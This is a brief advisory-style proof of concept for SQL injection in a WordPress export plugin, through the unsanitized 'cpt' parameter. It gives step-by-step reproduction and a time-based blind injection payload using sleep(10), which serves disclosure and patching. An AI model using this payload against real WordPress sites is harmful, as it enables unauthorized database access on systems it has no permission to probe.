The plugin does not sanitize the cpt POST parameter when exporting post data before using it in a database query, leading to an SQL injection vulnerability.
1. Go to the All Export > New Export screen in the WordPress admin.
2. Now click on Specific Post Type > Posts.
3. Click now on Migrate Posts and intercept this request and look for the name cpt:
Content-Disposition: form-data; name="cpt"
post
Change it to:
Content-Disposition: form-data; name="cpt"
post'+(select*from(select(sleep(10)))a)+'
Now you will see a later response of 10 seconds, thus confirming the authenticity of the sqli vulnerability.